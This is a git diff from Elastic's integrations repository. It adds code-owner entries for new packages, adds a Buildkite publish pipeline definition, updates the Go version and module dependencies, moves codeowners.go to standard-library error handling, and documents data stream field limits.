 /packages/microsoft_exchange_online_message_trace @elastic/security-service-integrations
+/packages/microsoft_exchange_server @elastic/sec-windows-platform
 /packages/microsoft_sqlserver @elastic/obs-infraobs-integrations
 /packages/mimecast @elastic/security-service-integrations
 /packages/modsecurity @elastic/sec-deployment-and-devices
@@ -254,6 +261,7 @@
 /packages/ping_one @elastic/security-service-integrations
 /packages/platform_observability @elastic/stack-monitoring
 /packages/postgresql @elastic/obs-infraobs-integrations
+/packages/pps @elastic/security-service-integrations
 /packages/prisma_cloud @elastic/security-service-integrations
 /packages/problemchild @elastic/ml-ui @elastic/sec-applied-ml
 /packages/prometheus @elastic/obs-infraobs-integrations
@@ -308,6 +316,7 @@
 /packages/ti_crowdstrike @elastic/security-service-integrations
 /packages/ti_cybersixgill @elastic/security-service-integrations
 /packages/ti_eclecticiq @elastic/security-service-integrations
+/packages/ti_eset @elastic/security-service-integrations
 /packages/ti_maltiverse @elastic/security-service-integrations
 /packages/ti_mandiant_advantage @elastic/security-service-integrations
 /packages/ti_misp @elastic/security-service-integrations
@@ -315,6 +324,7 @@
 /packages/ti_otx @elastic/security-service-integrations
 /packages/ti_rapid7_threat_command @elastic/security-service-integrations
 /packages/ti_recordedfuture @elastic/security-service-integrations
+/packages/ti_threatconnect @elastic/security-service-integrations
 /packages/ti_threatq @elastic/security-service-integrations
 /packages/ti_util @elastic/security-service-integrations
 /packages/tines @elastic/security-service-integrations
@@ -323,7 +333,7 @@
 /packages/trellix_edr_cloud @elastic/security-service-integrations
 /packages/trellix_epo_cloud @elastic/security-service-integrations
 /packages/trend_micro_vision_one @elastic/security-service-integrations
-/packages/trendmicro @elastic/sec-deployment-and-devices
+/packages/trendmicro @elastic/security-service-integrations
 /packages/udp @elastic/sec-deployment-and-devices
 /packages/universal_profiling_agent @elastic/profiling
 /packages/universal_profiling_collector @elastic/profiling
@@ -342,6 +352,7 @@
 /packages/windows/data_stream/powershell_operational @elastic/sec-windows-platform
 /packages/windows/data_stream/service @elastic/elastic-agent-data-plane
 /packages/windows/data_stream/sysmon_operational @elastic/sec-windows-platform
+/packages/windows_etw @elastic/sec-windows-platform
 /packages/winlog @elastic/sec-windows-platform
 /packages/wiz @elastic/security-service-integrations
 /packages/zeek @elastic/sec-deployment-and-devices
@@ -351,3 +362,4 @@
 /packages/zoom @elastic/security-service-integrations
 /packages/zscaler_zia @elastic/security-service-integrations
 /packages/zscaler_zpa @elastic/security-service-integrations
+/packages/jamf_protect @elastic/security-service-integrations
diff --git a/.gitignore b/.gitignore
index e4e354135dd..f0a3e41966f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,3 +6,6 @@ dev/packages elastic-package
+
+# Folder created by the Sonar Scanner
+.scannerwork/
diff --git a/.go-version b/.go-version
index 2844977405c..6fee2fedb0a 100644
--- a/.go-version
+++ b/.go-version
@@ -1 +1 @@
-1.21.1
+1.22.2
diff --git a/catalog-info.yaml b/catalog-info.yaml
index 0c8ab2ab769..58de250ff58 100644
--- a/catalog-info.yaml
+++ b/catalog-info.yaml
@@ -199,3 +199,47 @@ spec: access_level: MANAGE_BUILD_AND_READ everyone: access_level: BUILD_AND_READ + +--- +# yaml-language-server: $schema=https://gist.githubusercontent.com/elasticmachine/988b80dae436cafea07d9a4a460a011d/raw/e57ee3bed7a6f73077a3f55a38e76e40ec87a7cf/rre.schema.json +apiVersion: backstage.io/v1alpha1 +kind: Resource +metadata: + name: buildkite-pipeline-integrations-publish + description: 'Pipeline for the Integrations project to publish packages' + links: + - title: Pipeline + url: https://buildkite.com/elastic/integrations-publish + +spec: + type: buildkite-pipeline + owner: group:ingest-fp + system: buildkite + implementation: + apiVersion: buildkite.elastic.dev/v1 + kind: Pipeline + metadata: + name: integrations-publish + description: 'Pipeline for the Integrations project to publish packages' + spec: + # TODO: add backport-* in `branch_configuration` when these brances are updated + # branch_configuration: "main backport-*" + branch_configuration: "main" + pipeline_file: ".buildkite/pipeline.publish.yml" + provider_settings: + build_pull_request_forks: false + build_pull_requests: false # requires filter_enabled and filter_condition settings as below when used with buildkite-pr-bot + build_tags: false + filter_enabled: true + filter_condition: >- + build.pull_request.id == null || (build.creator.name == 'elasticmachine' && build.pull_request.id != null) + repository: elastic/integrations + cancel_intermediate_builds: true + cancel_intermediate_builds_branch_filter: '!main !backport-*' + skip_intermediate_builds: true + skip_intermediate_builds_branch_filter: '!main !backport-*' + teams: + ingest-fp: + access_level: MANAGE_BUILD_AND_READ + everyone: + access_level: READ_ONLY diff --git a/dev/codeowners/codeowners.go b/dev/codeowners/codeowners.go index 08a95f53672..95cd03d51df 100644 --- a/dev/codeowners/codeowners.go +++ b/dev/codeowners/codeowners.go 
@@ -8,12 +8,10 @@ import ( "bufio" "fmt" "io/fs" - "io/ioutil" "os" "path/filepath" "strings" - "github.com/pkg/errors" "gopkg.in/yaml.v2" ) @@ -51,7 +49,7 @@ type githubOwners struct { func readGithubOwners(codeownersPath string) (*githubOwners, error) { f, err := os.Open(codeownersPath) if err != nil { - return nil, errors.Wrapf(err, "failed to open %q", codeownersPath) + return nil, fmt.Errorf("failed to open %q: %w", codeownersPath, err) } defer f.Close() @@ -82,7 +80,7 @@ func readGithubOwners(codeownersPath string) (*githubOwners, error) { codeowners.owners[path] = owners } if err := scanner.Err(); err != nil { - return nil, errors.Wrapf(err, "scanner error") + return nil, fmt.Errorf("scanner error: %w", err) } return &codeowners, nil @@ -128,7 +126,7 @@ func (codeowners *githubOwners) checkManifest(path string) error { return fmt.Errorf("there is no owner for %q in %q", pkgDir, codeowners.path) } - content, err := ioutil.ReadFile(path) + content, err := os.ReadFile(path) if err != nil { return err } diff --git a/docs/generic_guidelines.md b/docs/generic_guidelines.md index 2f3d60e4646..ae2119a56ea 100644 --- a/docs/generic_guidelines.md +++ b/docs/generic_guidelines.md 
@@ -18,6 +18,21 @@ Starting with ECS 1.6, ECS is going to start using Basic types for some fields. All fields produced by an integration must be mapped by `fields.yml`. This guarantees that their index mapping is correct, and Kibana has enough info to deal with all fields. +##### Field limits + +By default, data streams will have a `total_fields.limit` setting of 1000. Besides defined custom fields, this also includes dynamically generated ECS fields. If your data stream is expected to eventually house more than 1000 fields, set an explicit limit in the `manifest.yml` of the data stream: +```yaml +elasticsearch: + index_template: + settings: + index: + mapping: + total_fields: + limit: 5000 +``` + +Note: For backwards compatibility, the limit is automatically bumped to 10000 fields if there are more than 500 fields explicitly defined for a data stream, however newly created integrations should not rely on this behavior but instead assume a fixed limit of 1000 fields. + ##### Specify metric types and units As part of the field definition, there are two settings that add metadata which will help Kibana graphing it: diff --git a/go.mod b/go.mod index 49b1cc480c6..da6636baf7a 100644 --- a/go.mod +++ b/go.mod 
@@ -1,26 +1,26 @@ module github.com/elastic/integrations -go 1.21.0 +go 1.22.0 require ( github.com/blang/semver v3.5.1+incompatible - github.com/elastic/elastic-package v0.96.0 + github.com/elastic/elastic-package v0.99.0 github.com/elastic/go-licenser v0.4.1 - github.com/elastic/package-registry v1.23.0 + github.com/elastic/package-registry v1.24.0 github.com/magefile/mage v1.15.0 github.com/pkg/errors v0.9.1 - github.com/stretchr/testify v1.8.4 - golang.org/x/tools v0.17.0 + github.com/stretchr/testify v1.9.0 + golang.org/x/tools v0.20.0 gopkg.in/yaml.v2 v2.4.0 ) require ( - cloud.google.com/go v0.110.10 // indirect - cloud.google.com/go/compute v1.23.3 // indirect + cloud.google.com/go v0.112.1 // indirect + cloud.google.com/go/compute v1.24.0 // indirect cloud.google.com/go/compute/metadata v0.2.3 // indirect - cloud.google.com/go/iam v1.1.5 // indirect - cloud.google.com/go/pubsub v1.33.0 // indirect - cloud.google.com/go/storage v1.35.1 // indirect + cloud.google.com/go/iam v1.1.7 // indirect + cloud.google.com/go/pubsub v1.37.0 // indirect + cloud.google.com/go/storage v1.40.0 // indirect github.com/AlecAivazis/survey/v2 v2.3.7 // indirect github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 // indirect github.com/MakeNowJust/heredoc v1.0.0 // indirect @@ -32,7 +32,7 @@ require ( github.com/Pallinder/go-randomdata v1.2.0 // indirect github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371 // indirect github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f // indirect - github.com/ProtonMail/gopenpgp/v2 v2.7.4 // indirect + github.com/ProtonMail/gopenpgp/v2 v2.7.5 // indirect github.com/andybalholm/brotli v1.0.4 // indirect github.com/armon/go-radix v1.0.0 // indirect github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect 
@@ -46,24 +46,25 @@ require ( github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5 // indirect github.com/dustin/go-humanize v1.0.1 // indirect - github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0 // indirect + github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0 // indirect github.com/elastic/go-elasticsearch/v7 v7.17.10 // indirect github.com/elastic/go-resource v0.1.1 // indirect github.com/elastic/go-sysinfo v1.9.0 // indirect - github.com/elastic/go-ucfg v0.8.6 // indirect + github.com/elastic/go-ucfg v0.8.8 // indirect github.com/elastic/go-windows v1.0.1 // indirect github.com/elastic/gojsonschema v1.2.1 // indirect github.com/elastic/kbncontent v0.1.3 // indirect - github.com/elastic/package-spec/v3 v3.0.4 // indirect + github.com/elastic/package-spec/v3 v3.1.3 // indirect github.com/emicklei/go-restful/v3 v3.11.0 // indirect github.com/evanphx/json-patch v5.7.0+incompatible // indirect - github.com/evanphx/json-patch/v5 v5.8.1 // indirect + github.com/evanphx/json-patch/v5 v5.9.0 // indirect github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f // indirect github.com/fatih/color v1.16.0 // indirect github.com/felixge/httpsnoop v1.0.4 // indirect - github.com/fsouza/fake-gcs-server v1.47.6 // indirect + github.com/fsouza/fake-gcs-server v1.48.0 // indirect github.com/go-errors/errors v1.4.2 // indirect - github.com/go-logr/logr v1.3.0 // indirect + github.com/go-logr/logr v1.4.1 // indirect + github.com/go-logr/stdr v1.2.2 // indirect github.com/go-ole/go-ole v1.2.6 // indirect github.com/go-openapi/errors v0.20.3 // indirect github.com/go-openapi/jsonpointer v0.19.6 // indirect 
@@ -72,7 +73,7 @@ require ( github.com/go-openapi/swag v0.22.3 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da // indirect - github.com/golang/protobuf v1.5.3 // indirect + github.com/golang/protobuf v1.5.4 // indirect github.com/golang/snappy v0.0.4 // indirect github.com/google/btree v1.1.2 // indirect github.com/google/gnostic-models v0.6.8 // indirect @@ -85,8 +86,8 @@ require ( github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect github.com/google/uuid v1.6.0 // indirect github.com/googleapis/enterprise-certificate-proxy v0.3.2 // indirect - github.com/googleapis/gax-go/v2 v2.12.0 // indirect - github.com/gorilla/handlers v1.5.1 // indirect + github.com/googleapis/gax-go/v2 v2.12.3 // indirect + github.com/gorilla/handlers v1.5.2 // indirect github.com/gorilla/mux v1.8.1 // indirect github.com/gorilla/websocket v1.5.0 // indirect github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 // indirect @@ -102,7 +103,7 @@ require ( github.com/josharian/intern v1.0.0 // indirect github.com/json-iterator/go v1.1.12 // indirect github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect - github.com/klauspost/compress v1.17.0 // indirect + github.com/klauspost/compress v1.17.6 // indirect github.com/klauspost/pgzip v1.2.5 // indirect github.com/liggitt/tabwriter v0.0.0-20181228230101-89fcab3d43de // indirect github.com/lithammer/shortuuid/v3 v3.0.7 // indirect @@ -111,7 +112,6 @@ require ( github.com/mattn/go-colorable v0.1.13 // indirect github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-runewidth v0.0.14 // indirect - github.com/matttproud/golang_protobuf_extensions v1.0.4 // indirect github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d // indirect github.com/mholt/archiver/v3 v3.5.1 // indirect github.com/mitchellh/copystructure v1.2.0 // indirect 
@@ -133,20 +133,20 @@ require ( github.com/pkg/xattr v0.4.9 // indirect github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 // indirect github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c // indirect - github.com/prometheus/client_golang v1.17.0 // indirect - github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16 // indirect - github.com/prometheus/common v0.44.0 // indirect - github.com/prometheus/procfs v0.11.1 // indirect + github.com/prometheus/client_golang v1.19.0 // indirect + github.com/prometheus/client_model v0.5.0 // indirect + github.com/prometheus/common v0.48.0 // indirect + github.com/prometheus/procfs v0.12.0 // indirect github.com/rivo/uniseg v0.4.3 // indirect github.com/russross/blackfriday/v2 v2.1.0 // indirect - github.com/shirou/gopsutil/v3 v3.23.12 // indirect + github.com/shirou/gopsutil/v3 v3.24.2 // indirect github.com/shoenig/go-m1cpu v0.1.6 // indirect github.com/shopspring/decimal v1.3.1 // indirect github.com/spf13/afero v1.11.0 // indirect - github.com/spf13/cast v1.5.1 // indirect + github.com/spf13/cast v1.6.0 // indirect github.com/spf13/cobra v1.8.0 // indirect github.com/spf13/pflag v1.0.5 // indirect - github.com/stretchr/objx v0.5.1 // indirect + github.com/stretchr/objx v0.5.2 // indirect github.com/tklauser/go-sysconf v0.3.12 // indirect github.com/tklauser/numcpus v0.6.1 // indirect github.com/ulikunitz/xz v0.5.11 // indirect 
@@ -154,44 +154,48 @@ require ( github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect github.com/xlab/treeprint v1.2.0 // indirect - github.com/yusufpapurcu/wmi v1.2.3 // indirect - go.elastic.co/apm/module/apmgorilla/v2 v2.4.7 // indirect - go.elastic.co/apm/module/apmhttp/v2 v2.4.7 // indirect - go.elastic.co/apm/module/apmzap/v2 v2.4.7 // indirect - go.elastic.co/apm/v2 v2.4.7 // indirect + github.com/yusufpapurcu/wmi v1.2.4 // indirect + go.elastic.co/apm/module/apmgorilla/v2 v2.5.0 // indirect + go.elastic.co/apm/module/apmhttp/v2 v2.5.0 // indirect + go.elastic.co/apm/module/apmzap/v2 v2.5.0 // indirect + go.elastic.co/apm/v2 v2.5.0 // indirect go.elastic.co/ecszap v1.0.2 // indirect go.elastic.co/fastjson v1.1.0 // indirect go.mongodb.org/mongo-driver v1.11.1 // indirect go.opencensus.io v0.24.0 // indirect + go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 // indirect + go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0 // indirect + go.opentelemetry.io/otel v1.24.0 // indirect + go.opentelemetry.io/otel/metric v1.24.0 // indirect + go.opentelemetry.io/otel/trace v1.24.0 // indirect go.starlark.net v0.0.0-20230525235612-a134d8f9ddca // indirect go.uber.org/multierr v1.11.0 // indirect - go.uber.org/zap v1.26.0 // indirect - golang.org/x/crypto v0.18.0 // indirect - golang.org/x/mod v0.14.0 // indirect - golang.org/x/net v0.20.0 // indirect - golang.org/x/oauth2 v0.15.0 // indirect - golang.org/x/sync v0.6.0 // indirect - golang.org/x/sys v0.16.0 // indirect - golang.org/x/term v0.16.0 // indirect + go.uber.org/zap v1.27.0 // indirect + golang.org/x/crypto v0.22.0 // indirect + golang.org/x/mod v0.17.0 // indirect + golang.org/x/net v0.24.0 // indirect + golang.org/x/oauth2 v0.18.0 // indirect + golang.org/x/sync v0.7.0 // indirect + golang.org/x/sys v0.19.0 // indirect + golang.org/x/term v0.19.0 // indirect 
golang.org/x/text v0.14.0 // indirect golang.org/x/time v0.5.0 // indirect - golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect - google.golang.org/api v0.152.0 // indirect - google.golang.org/appengine v1.6.7 // indirect - google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17 // indirect - google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17 // indirect - google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f // indirect - google.golang.org/grpc v1.59.0 // indirect - google.golang.org/protobuf v1.31.0 // indirect + google.golang.org/api v0.171.0 // indirect + google.golang.org/appengine v1.6.8 // indirect + google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9 // indirect + google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c // indirect + google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c // indirect + google.golang.org/grpc v1.62.1 // indirect + google.golang.org/protobuf v1.33.0 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect - helm.sh/helm/v3 v3.14.0 // indirect + helm.sh/helm/v3 v3.14.3 // indirect howett.net/plist v1.0.0 // indirect - k8s.io/api v0.29.1 // indirect + k8s.io/api v0.29.3 // indirect k8s.io/apiextensions-apiserver v0.29.0 // indirect - k8s.io/apimachinery v0.29.1 // indirect - k8s.io/cli-runtime v0.29.1 // indirect - k8s.io/client-go v0.29.1 // indirect + k8s.io/apimachinery v0.29.3 // indirect + k8s.io/cli-runtime v0.29.3 // indirect + k8s.io/client-go v0.29.3 // indirect k8s.io/component-base v0.29.0 // indirect k8s.io/klog/v2 v2.110.1 // indirect k8s.io/kube-openapi v0.0.0-20231010175941-2dd684a91f00 // indirect diff --git a/go.sum b/go.sum index b338e7c5fa0..fa3c5d339e1 100644 --- a/go.sum +++ b/go.sum 
@@ -1,18 +1,18 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= -cloud.google.com/go v0.110.10 h1:LXy9GEO+timppncPIAZoOj3l58LIU9k+kn48AN7IO3Y= -cloud.google.com/go v0.110.10/go.mod h1:v1OoFqYxiBkUrruItNM3eT4lLByNjxmJSV/xDKJNnic= -cloud.google.com/go/compute v1.23.3 h1:6sVlXXBmbd7jNX0Ipq0trII3e4n1/MsADLK6a+aiVlk= -cloud.google.com/go/compute v1.23.3/go.mod h1:VCgBUoMnIVIR0CscqQiPJLAG25E3ZRZMzcFZeQ+h8CI= +cloud.google.com/go v0.112.1 h1:uJSeirPke5UNZHIb4SxfZklVSiWWVqW4oXlETwZziwM= +cloud.google.com/go v0.112.1/go.mod h1:+Vbu+Y1UU+I1rjmzeMOb/8RfkKJK2Gyxi1X6jJCZLo4= +cloud.google.com/go/compute v1.24.0 h1:phWcR2eWzRJaL/kOiJwfFsPs4BaKq1j6vnpZrc1YlVg= +cloud.google.com/go/compute v1.24.0/go.mod h1:kw1/T+h/+tK2LJK0wiPPx1intgdAM3j/g3hFDlscY40= cloud.google.com/go/compute/metadata v0.2.3 h1:mg4jlk7mCAj6xXp9UJ4fjI9VUI5rubuGBW5aJ7UnBMY= cloud.google.com/go/compute/metadata v0.2.3/go.mod h1:VAV5nSsACxMJvgaAuX6Pk2AawlZn8kiOGuCv6gTkwuA= -cloud.google.com/go/iam v1.1.5 h1:1jTsCu4bcsNsE4iiqNT5SHwrDRCfRmIaaaVFhRveTJI= -cloud.google.com/go/iam v1.1.5/go.mod h1:rB6P/Ic3mykPbFio+vo7403drjlgvoWfYpJhMXEbzv8= -cloud.google.com/go/kms v1.15.5 h1:pj1sRfut2eRbD9pFRjNnPNg/CzJPuQAzUujMIM1vVeM= -cloud.google.com/go/kms v1.15.5/go.mod h1:cU2H5jnp6G2TDpUGZyqTCoy1n16fbubHZjmVXSMtwDI= -cloud.google.com/go/pubsub v1.33.0 h1:6SPCPvWav64tj0sVX/+npCBKhUi/UjJehy9op/V3p2g= -cloud.google.com/go/pubsub v1.33.0/go.mod h1:f+w71I33OMyxf9VpMVcZbnG5KSUkCOUHYpFd5U1GdRc= -cloud.google.com/go/storage v1.35.1 h1:B59ahL//eDfx2IIKFBeT5Atm9wnNmj3+8xG/W4WB//w= -cloud.google.com/go/storage v1.35.1/go.mod h1:M6M/3V/D3KpzMTJyPOR/HU6n2Si5QdaXYEsng2xgOs8= +cloud.google.com/go/iam v1.1.7 h1:z4VHOhwKLF/+UYXAJDFwGtNF0b6gjsW1Pk9Ml0U/IoM= +cloud.google.com/go/iam v1.1.7/go.mod h1:J4PMPg8TtyurAUvSmPj8FF3EDgY1SPRZxcUGrn7WXGA= +cloud.google.com/go/kms v1.15.7 h1:7caV9K3yIxvlQPAcaFffhlT7d1qpxjB1wHBtjWa13SM= +cloud.google.com/go/kms v1.15.7/go.mod h1:ub54lbsa6tDkUwnu4W7Yt1aAIFLnspgh0kPGToDukeI= 
+cloud.google.com/go/pubsub v1.37.0 h1:0uEEfaB1VIJzabPpwpZf44zWAKAme3zwKKxHk7vJQxQ= +cloud.google.com/go/pubsub v1.37.0/go.mod h1:YQOQr1uiUM092EXwKs56OPT650nwnawc+8/IjoUeGzQ= +cloud.google.com/go/storage v1.40.0 h1:VEpDQV5CJxFmJ6ueWNsKxcr1QAYOXEgxDa+sBbJahPw= +cloud.google.com/go/storage v1.40.0/go.mod h1:Rrj7/hKlG87BLqDJYtwR0fbPld8uJPbQ2ucUMY7Ir0g= github.com/AlecAivazis/survey/v2 v2.3.7 h1:6I/u8FvytdGsgonrYsVn2t8t4QiRnh6QSTqkkhIiSjQ= github.com/AlecAivazis/survey/v2 v2.3.7/go.mod h1:xUTIdE4KCOIjsBAE1JYsUPoCqYdZ1reCfTwbto0Fduo= github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 h1:UQHMgLO+TxOElx5B5HZ4hJQsoJ/PvUvKRhJHDQXO8P8= @@ -42,8 +42,8 @@ github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371 h1:kkhsdkhsCv github.com/ProtonMail/go-crypto v0.0.0-20230828082145-3c4c8a2d2371/go.mod h1:EjAoLdwvbIOoOQr3ihjnSoLZRtE8azugULFRteWMNc0= github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f h1:tCbYj7/299ekTTXpdwKYF8eBlsYsDVoggDAuAjoK66k= github.com/ProtonMail/go-mime v0.0.0-20230322103455-7d82a3887f2f/go.mod h1:gcr0kNtGBqin9zDW9GOHcVntrwnjrK+qdJ06mWYBybw= -github.com/ProtonMail/gopenpgp/v2 v2.7.4 h1:Vz/8+HViFFnf2A6XX8JOvZMrA6F5puwNvvF21O1mRlo= -github.com/ProtonMail/gopenpgp/v2 v2.7.4/go.mod h1:IhkNEDaxec6NyzSI0PlxapinnwPVIESk8/76da3Ct3g= +github.com/ProtonMail/gopenpgp/v2 v2.7.5 h1:STOY3vgES59gNgoOt2w0nyHBjKViB/qSg7NjbQWPJkA= +github.com/ProtonMail/gopenpgp/v2 v2.7.5/go.mod h1:IhkNEDaxec6NyzSI0PlxapinnwPVIESk8/76da3Ct3g= github.com/andybalholm/brotli v1.0.1/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y= github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY= github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 
@@ -93,10 +93,10 @@ github.com/dsnet/compress v0.0.2-0.20210315054119-f66993602bf5/go.mod h1:qssHWj6 github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY= github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto= -github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0 h1:SItTCXxjpeE2kr+3bptl7ZmG3P88pLDCXX23tObteTc= -github.com/elastic/elastic-integration-corpus-generator-tool v0.9.0/go.mod h1:9Jjc1xsrnMwOA3TfG0arlXRCb0AhShCUU4YtwpBCURI= -github.com/elastic/elastic-package v0.96.0 h1:RLkNBElCuRZ53/e09HvrZfpwlEYQzazJp77F913mYxM= -github.com/elastic/elastic-package v0.96.0/go.mod h1:kR2uD/65qcUS8UClGT8QxoJsgdDjzUyI94X/PScF2Jg= +github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0 h1:sx1lpZuTG5suJuvgix4FWQFCLFFbzkoOmPoHWYOPLCY= +github.com/elastic/elastic-integration-corpus-generator-tool v0.10.0/go.mod h1:2/30n+2QRzRzus4TPVUV1T3U/j8g2ItUgvP0pcpjLGk= +github.com/elastic/elastic-package v0.99.0 h1:VkZM/OqISPt9S6QQFRUiEONmqHIaSJM2yl9uETddF+A= +github.com/elastic/elastic-package v0.99.0/go.mod h1:JTVHETbekKMbqy8kedyzZ58qextRKFYJgGrRZkNct4Y= github.com/elastic/go-elasticsearch/v7 v7.17.10 h1:TCQ8i4PmIJuBunvBS6bwT2ybzVFxxUhhltAs3Gyu1yo= github.com/elastic/go-elasticsearch/v7 v7.17.10/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/elastic/go-licenser v0.4.1 h1:1xDURsc8pL5zYT9R29425J3vkHdt4RT5TNEMeRN48x4= 
@@ -105,18 +105,18 @@ github.com/elastic/go-resource v0.1.1 h1:vM173uhPoaZ7C64rKrYbbBn5kxOhstE1+YcGFte github.com/elastic/go-resource v0.1.1/go.mod h1:7F1Wjs6eSFX0i/235yAK/x9bvPNd9/ML92AiULa4XYA= github.com/elastic/go-sysinfo v1.9.0 h1:usICqY/Nw4Mpn9f4LdtpFrKxXroJDe81GaxxUlCckIo= github.com/elastic/go-sysinfo v1.9.0/go.mod h1:eBD1wEGVaRnRLGecc9iG1z8eOv5HnEdz9+nWd8UAxcE= -github.com/elastic/go-ucfg v0.8.6 h1:stUeyh2goTgGX+/wb9gzKvTv0YB0231LTpKUgCKj4U0= -github.com/elastic/go-ucfg v0.8.6/go.mod h1:4E8mPOLSUV9hQ7sgLEJ4bvt0KhMuDJa8joDT2QGAEKA= +github.com/elastic/go-ucfg v0.8.8 h1:54KIF/2zFKfl0MzsSOCGOsZ3O2bnjFQJ0nDJcLhviyk= +github.com/elastic/go-ucfg v0.8.8/go.mod h1:4E8mPOLSUV9hQ7sgLEJ4bvt0KhMuDJa8joDT2QGAEKA= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= github.com/elastic/gojsonschema v1.2.1 h1:cUMbgsz0wyEB4x7xf3zUEvUVDl6WCz2RKcQPul8OsQc= github.com/elastic/gojsonschema v1.2.1/go.mod h1:biw5eBS2Z4T02wjATMRSfecfjCmwaDPvuaqf844gLrg= github.com/elastic/kbncontent v0.1.3 h1:qT0RkshRhiAgH51dDD983tJloeLLMCYE/qlRRtn3R8k= github.com/elastic/kbncontent v0.1.3/go.mod h1:kOPREITK9gSJsiw/WKe7QWSO+PRiZMyEFQCw+CMLAHI= -github.com/elastic/package-registry v1.23.0 h1:+4lRKzpyw4bV1FARijKHH25zNatGdq6cAOI4CwSkB4Q= -github.com/elastic/package-registry v1.23.0/go.mod h1:wcSKCjvARw05GqJEc3Akr35p5jYG5HLKgny/7dghuzA= -github.com/elastic/package-spec/v3 v3.0.4 h1:IZDRpVoMPztSgONUGbTR6re0VxpkitMDR/HwcLQpt7g= -github.com/elastic/package-spec/v3 v3.0.4/go.mod h1:zMVyksPTDFsWxxdbw3ahXBs6O0G2tULA7HXjFl8w8zA= +github.com/elastic/package-registry v1.24.0 h1:LAhw2J3qg4av5yGBa/6ZhF6I87RlnAAKSQQnoxxzDf8= +github.com/elastic/package-registry v1.24.0/go.mod h1:c/xP7+n9csO7ts6UFe7x2CkN7M7KGxVg/uyGbbnzMxQ= +github.com/elastic/package-spec/v3 v3.1.3 h1:MxFjUMdiFiTgSIsXppR7sv91BA7JTyr/HuUK6NeFiPI= +github.com/elastic/package-spec/v3 v3.1.3/go.mod 
h1:GibfBsEvTOhQJA5kojOEXS+IIo49MPu6IgydhXSH1iY= github.com/emicklei/go-restful/v3 v3.11.0 h1:rAQeMHw1c7zTmncogyy8VvRZwtkmkZ4FxERmMY4rD+g= github.com/emicklei/go-restful/v3 v3.11.0/go.mod h1:6n3XBCmQQb25CM2LCACGz8ukIrRry+4bhvbpWn3mrbc= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= 
